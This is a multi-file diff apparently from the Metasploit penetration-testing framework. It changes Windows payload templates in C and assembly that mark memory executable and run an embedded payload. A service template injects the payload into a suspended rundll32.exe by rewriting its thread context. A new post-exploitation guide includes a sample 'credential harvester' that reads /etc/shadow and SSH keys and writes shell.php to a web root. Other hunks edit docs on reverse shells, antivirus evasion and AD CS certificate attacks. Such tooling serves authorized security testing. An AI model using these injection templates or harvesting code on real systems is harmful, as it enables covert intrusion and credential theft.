-EndGlobal
@@ -1,343 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="service"
-	ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-	RootNamespace="service"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../service.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../template_x64_windows_svc.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\service.c"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
@@ -1,11 +1,11 @@
-#include <stdio.h>
+#include <windows.h>

 #define SCSIZE 4096
-char payload[SCSIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

-char comment[512] = "";
-
-int main(int argc, char **argv) {
-	(*(void (*)()) payload)();
-	return(0);
+void main() {
+	DWORD dwOldProtect;
+	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
+	(*(void (*)()) bPayload)();
+	return;
 }
@@ -1,32 +0,0 @@
-; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Architecture: x64
-;
-; Assemble and link with the following command:
-; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main 
-
-extrn ExitProcess : proc
-extrn VirtualAlloc : proc
-
-.code
-
-	main proc 
-		sub rsp, 40        ;
-		mov r9, 40h        ; 
-		mov r8, 3000h      ; 
-		mov rdx, 4096      ; 
-		xor rcx, rcx       ; 
-		call VirtualAlloc  ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
-		mov rcx, 4096      ;
-		mov rsi, payload   ;
-		mov rdi, rax       ;
-		rep movsb          ; memcpy( lpPayload, payload, 4096 );
-		call rax           ; lpPayload();
-		xor rcx, rcx       ;
-		call ExitProcess   ; ExitProcess( 0 );
-	main endp
-	
-	payload proc
-		A byte 'PAYLOAD:'
-		B db 4096-8 dup ( 0 )
-	payload endp
-end
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,16 +1,28 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>

-#define PAYLOAD_SIZE	8192
+#define SCSIZE 8192

 char cServiceName[32] = "SERVICENAME";

-char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

 SERVICE_STATUS ss;

 SERVICE_STATUS_HANDLE hStatus = NULL;

+#if BUILDMODE == 2
+/* hand-rolled bzero allows us to avoid including ms vc runtime */
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+#endif
+
 /*
 *
 */
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	PROCESS_INFORMATION pi;
 	LPVOID lpPayload = NULL;

-	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
-	ZeroMemory( &si, sizeof(STARTUPINFO) );
-	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
+	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
+	inline_bzero( &si, sizeof(STARTUPINFO) );
+	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

 	si.cb = sizeof(STARTUPINFO);

@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

 	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
-  
+
 	if ( hStatus )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
-		  
+
 			GetThreadContext( pi.hThread, &Context );
-		  
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
 #ifdef _WIN64
-				Context.Rip = (DWORD64)lpPayload;
+				Context.Rip = (ULONG_PTR)lpPayload;
 #else
-				Context.Eip = (DWORD)lpPayload;
+				Context.Eip = (ULONG_PTR)lpPayload;
 #endif
 				SetThreadContext( pi.hThread, &Context );
 			}

 			ResumeThread( pi.hThread );
-			
+
 			CloseHandle( pi.hThread );
-		  
+
 			CloseHandle( pi.hProcess );
 		}
-		
+
 		ServiceHandler( SERVICE_CONTROL_STOP );
-		
+
 		ExitProcess( 0 );
 	}
 }
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 /*
 *
 */
-int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
+void main()
 {
-	SERVICE_TABLE_ENTRY st[] = 
-    { 
-        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
-        { NULL, NULL } 
-    };
-	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	SERVICE_TABLE_ENTRY st[] =
+		{
+			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
+			{ NULL, NULL }
+		};
+	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	return;
 }
@@ -24,3 +24,4 @@ wkssvc
 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
 db2remotecmd
 CxUIUSvcChannel
+cert
@@ -1,3 +1,5 @@
+acf-extended
+ai-engine
 ajax-load-more
 all-in-one-wp-migration
 backup
@@ -23,6 +25,7 @@ gi-media-library
 give
 hash-form
 inboundio-marketing
+king-addons
 learnpress
 loginizer
 masterstudy-lms-learning-management-system
@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema[7.1].define(version: 2025_02_04_172657) do
+ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

@@ -803,5 +803,4 @@ ActiveRecord::Schema[7.1].define(version: 2025_02_04_172657) do
    t.boolean "limit_to_network", default: false, null: false
    t.boolean "import_fingerprint", default: false
  end
-
 end
@@ -57,4 +57,4 @@ override.
 ```bash
 echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
 ```
-Now you should be able get reverse shells working
+Now you should be able to get reverse shells working
@@ -1 +1 @@
-3.2.5
+3.3.8
@@ -1,18 +1,38 @@
-# Chat
+# Primary Communication Channels

-A lot of our discussion happens on IRC in #metasploit on Freenode.
+## GitHub Discussions
+For community support, questions, and general discussion, visit our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions).
+
+## Slack
+Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat with the community and developers.
+
+## GitHub Issues
+Submit bug reports and feature requests through [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues).
+
+# Additional Communication Channels
+
+## Chat
+
+Some community discussion still happens on IRC in #metasploit on Freenode.
 Please be patient and hang around for a while -- not everyone is awake
 at the same time as you. =)

-# Mailing list
+## Mailing list

 The Metasploit development mailing list used to be hosted on SourceForge, but is now on Google Groups. Metasploit Hackers is dead, long live [Metasploit Hackers][list]. (Or [mailto:Metasploit Hackers][mailto]).

 The old list [is archived on seclists.org][archive].

+## Social Media
+
+- **X**: [@metasploit](https://x.com/metasploit)
+- **Mastodon**: [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit)
+- **Blog**: [Rapid7 Blog - Metasploit Tag](https://www.rapid7.com/blog/tag/metasploit/)
+- **YouTube**: [Metasploit YouTube](https://youtube.com/@MetasploitR7)
+
 # Abuse

-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to caitlin_condon@rapid7.com or todb@metasploit.com.
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.


 [archive]: http://seclists.org/metasploit/ "Metasploit mailing list archive"
@@ -12,8 +12,12 @@ The pgp signatures below can be verified with the following [public key](https:/

 | Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
 |--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
-| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
-| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.9-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.9-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Linux 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.8-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.8-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
 | [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
@@ -6,4 +6,4 @@
 * [Facts and myths about antivirus evasion with Metasploit](http://schierlm.users.sourceforge.net/avevasion.html)
 * [Using metasm to avoid antivirus detection ghost writing asm](https://web.archive.org/web/20200330111926/https://www.pentestgeek.com/penetration-testing/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm)

-There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the about articles should get you started.
+There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the above articles should get you started.
@@ -110,7 +110,7 @@ end

    * **Stability** - The Stability field describes how the exploit affects the system it's being run on, ex: `CRASH_SAFE`, `CRASH_OS_DOWN`
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
-    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
+    * **SideEffects** - The SideEffects field describes the side effects caused by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

 ### Non-required fields

@@ -41,7 +41,7 @@ include Msf::Auxiliary::Scanner

 A couple of new things will be added to your module when you include this mixin. You will have a new datastore option named "RHOSTS", which allows the user to specify multiple hosts. There's a new "THREADS" option, which allows the number of threads to run during execution. There's also "ShowProgress" and "ShowProgressPercent" for tracking scan progress.

-Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanenr``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.
+Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanner``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.

 ## Templates

@@ -0,0 +1,192 @@
+# Post Exploitation Mixins
+
+Post exploitation mixins provide a consistent API for interacting with compromised systems across different session types (Meterpreter, shell, PowerShell). Located in `lib/msf/core/post/`, these mixins abstract platform and session type differences.
+
+## Msf::Post::Common
+
+Core utilities for command execution and session interaction.
+
+```ruby
+include Msf::Post::Common
+
+# Modern API - use create_process for commands with arguments
+output = create_process('grep', args: ['-r', pattern, '/var/log'], time_out: 30, opts: { 'Hidden' => true })
+
+# Legacy API - cmd_exec only for static command strings
+hostname = cmd_exec('hostname')
+
+# Environment variables
+env_vars = get_envs('HOME', 'USER', 'PATH')  # Returns hash of env vars
+home = get_env('HOME')                        # Single variable
+
+# Check command availability
+if command_exists?('python3')
+  version = create_process('python3', args: ['--version'])
+end
+
+# Session information
+target = "#{rhost}:#{rport}"  # Or use: peer
+```
+
+## Msf::Post::File
+
+Cross-platform file system operations.
+
+```ruby
+include Msf::Post::File
+
+# Navigation and listing
+current = pwd
+cd('/tmp')
+files = dir('/etc')  # or ls('/etc')
+
+# File checks
+if file?('/etc/passwd') && readable?('/etc/passwd')
+  content = read_file('/etc/passwd')
+  store_loot('passwd', 'text/plain', session, content)
+end
+
+if directory?('/var/www') && writable?('/var/www')
+  write_file('/var/www/shell.php', payload)
+end
+
+# File operations
+mkdir('/tmp/staging')              # Auto-registered for cleanup
+data = read_file('/etc/shadow')
+write_file('/tmp/output.txt', data)
+hash = file_remote_digestmd5('/bin/bash')
+
+# Path expansion
+expanded = expand_path('$HOME/.ssh/id_rsa')  # Unix
+expanded = expand_path('%APPDATA%\\data')     # Windows
+```
+
+## Msf::Post::Process
+
+Process enumeration and manipulation.
+
+```ruby
+include Msf::Post::Process
+
+# Enumerate processes
+processes = get_processes
+processes.each { |p| print_line("#{p['pid']}: #{p['name']}") }
+
+# Find specific processes
+nginx_pids = pidof('nginx')
+if nginx_pids.any?
+  print_good("Found nginx: #{nginx_pids.join(', ')}")
+  nginx_pids.each { |pid| kill_process(pid) }
+end
+
+# Check process existence
+if has_pid?(1234)
+  print_good("Process 1234 is running")
+end
+```
+
+## Msf::Post::Unix
+
+Unix/Linux-specific utilities.
+
+```ruby
+include Msf::Post::Unix
+
+# Privilege checking
+if is_root?
+  print_good("Running as root")
+else
+  print_warning("Running as #{whoami}")
+end
+
+# User enumeration
+users = get_users
+users.each do |u|
+  print_line("#{u['name']} (UID: #{u['uid']}, Shell: #{u['shell']})")
+end
+admin_users = users.select { |u| u['uid'].to_i == 0 }
+
+# Group enumeration
+groups = get_groups
+sudo_group = groups.find { |g| g['name'] =~ /sudo|wheel/ }
+print_good("Sudo users: #{sudo_group['users']}") if sudo_group
+
+# Find SSH keys and interesting files
+ssh_keys = enum_user_directories
+ssh_keys.each do |key|
+  content = read_file(key)
+  store_loot('ssh.key', 'text/plain', session, content, key)
+end
+```
+
+## Platform-Specific Mixins
+
+### Msf::Post::Windows
+Windows-specific operations including registry manipulation, service management, and Windows API access. See Windows-specific documentation.
+
+### Msf::Post::Linux
+Linux-specific system information gathering and kernel utilities.
+
+### Msf::Post::OSX
+macOS-specific utilities and system interaction methods.
+
+### Msf::Post::Android
+Android device interaction and data collection methods.
+
+### Msf::Post::Hardware
+Hardware interaction utilities (e.g., USB devices, serial ports).
+
+## Example Module
+
+```ruby
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Linux Credential Harvester',
+      'Description' => 'Collects credentials from Linux system',
+      'License' => MSF_LICENSE,
+      'Author' => ['Your Name'],
+      'Platform' => ['linux'],
+      'SessionTypes' => ['meterpreter', 'shell']
+    ))
+  end
+
+  def run
+    print_status("Harvesting credentials on #{peer}")
+    
+    if is_root?
+      # Root access - collect shadow file
+      if readable?('/etc/shadow')
+        shadow = read_file('/etc/shadow')
+        store_loot('shadow', 'text/plain', session, shadow, '/etc/shadow')
+      end
+    end
+    
+    # Collect SSH keys
+    ssh_keys = enum_user_directories
+    ssh_keys.each do |key_path|
+      key = read_file(key_path)
+      store_loot('ssh.key', 'text/plain', session, key, key_path)
+    end
+    
+    # Check for interesting processes
+    if pidof('sshd').any?
+      print_good("SSH daemon running")
+    end
+  end
+end
+```
+
+## Best Practices
+
+- **Use `create_process`** for commands with arguments: `create_process('ls', args: ['-la', path])`
+- **Use `cmd_exec`** only for static strings: `cmd_exec('hostname')`
+- **Check before acting**: Use `file?()`, `readable?()`, `writable?()` before file operations
+- **Handle errors**: Wrap operations in `begin/rescue` blocks
+- **Register cleanup**: Files created with `write_file()` are auto-registered; use `register_file_for_cleanup()` for others
+- **Store loot properly**: Use `store_loot()` to save collected data
+- **Check session type**: Some operations behave differently on Meterpreter vs shell sessions
+
@@ -14,6 +14,11 @@ flowchart TD
        ESC8(ESC8)
        ESC8 --> web_enrollment[<i>Issuance via Web Enrollment</i>]
    end
+    subgraph esc_update_ldap_object[<b>esc_update_ldap_object</b>]
+        ESC9(ESC9) --> weak_certificate_mapping[<i>Issuance via Weak Certificate Mapping</i>]
+        ESC10(ESC10) --> weak_certificate_mapping[<i>Issuance via Weak Certificate Mapping</i>]
+        ESC16(ESC16) --> weak_certificate_mapping[<i>Issuance via Weak Certificate Mapping</i>]
+    end
    subgraph icpr_cert[<b>icpr_cert</b>]
        ESC1(ESC1)
        ESC2(ESC2)
@@ -51,6 +56,8 @@ flowchart TD
    update_template --> ESC1
    web_enrollment --> PKINIT
    web_enrollment --> SCHANNEL
+    weak_certificate_mapping --> PKINIT
+    weak_certificate_mapping --> SCHANNEL
 ```

 The chart above showcases how one can go about attacking each of the AD CS vulnerabilities supported by Metasploit,
@@ -94,11 +101,13 @@ Later, additional techniques were disclosed by security researchers:
  `StrongCertificateBindingEnforcement` not set to 2 or `CertificateMappingMethods` contains `UPN` flag.
  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc9]]
 - ESC10 - Weak Certificate Mappings - `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
